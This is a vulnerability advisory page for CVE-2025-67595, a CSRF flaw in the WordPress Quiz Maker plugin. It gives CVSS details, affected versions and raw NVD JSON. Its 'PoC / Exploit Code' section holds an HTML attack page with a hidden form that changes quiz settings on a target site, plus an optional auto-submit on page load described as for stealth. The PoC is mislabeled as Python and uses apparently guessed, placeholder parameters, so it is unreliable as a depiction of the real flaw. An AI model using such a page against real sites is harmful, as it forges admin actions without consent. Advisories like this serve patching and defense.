Security Vulnerability Report
中文
CVE-2025-67595 CVSS 4.3 MEDIUM

CVE-2025-67595

Published: 2025-12-09 16:18:38
Last Modified: 2026-04-27 18:16:46

Description

Cross-Site Request Forgery (CSRF) vulnerability in Ays Pro Quiz Maker quiz-maker allows Cross Site Request Forgery.This issue affects Quiz Maker: from n/a through <= 6.7.0.82.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ays-pro:quiz_maker:*:*:*:*:*:wordpress:*:* - VULNERABLE
Quiz Maker WordPress Plugin <= 6.7.0.82

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-67595 --> <!-- This PoC demonstrates a CSRF attack targeting Quiz Maker plugin --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-67595</title> </head> <body> <h1>CSRF PoC for Quiz Maker Plugin</h1> <p>Click the button below to trigger the attack:</p> <!-- Auto-submit form targeting Quiz Maker admin action --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Quiz Maker CSRF vulnerable parameter --> <input type="hidden" name="action" value="quiz_maker_ajax_action"> <input type="hidden" name="sub_action" value="update_quiz_settings"> <!-- Malicious payload - modify quiz settings --> <input type="hidden" name="quiz_id" value="1"> <input type="hidden" name="quiz_settings" value="malicious_settings"> <!-- Additional parameters that would normally require CSRF token --> <input type="hidden" name="ays_quiz_tab" value="settings"> </form> <button onclick="document.getElementById('csrfForm').submit();">Click Me</button> <script> // Auto-submit on page load (for stealth attack) // window.onload = function() { document.getElementById('csrfForm').submit(); }; </script> <h2>Attack Description:</h2> <ul> <li>Target: WordPress Quiz Maker Plugin <= 6.7.0.82</li> <li>Vulnerability: Missing CSRF token validation</li> <li>Impact: Unauthorized actions on behalf of logged-in admin</li> <li>Prerequisites: Admin must be logged in and visit attacker page</li> </ul> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67595", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:37.757", "lastModified": "2026-04-27T18:16:45.897", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Ays Pro Quiz Maker quiz-maker allows Cross Site Request Forgery.This issue affects Quiz Maker: from n/a through <= 6.7.0.82."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ays-pro:quiz_maker:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "6.7.0.83", "matchCriteriaId": "6626875A-C2C8-4F54-A040-948A8C9D0BCE"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/quiz-maker/vulnerability/wordpress-quiz-maker-plugin-6-7-0-82-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}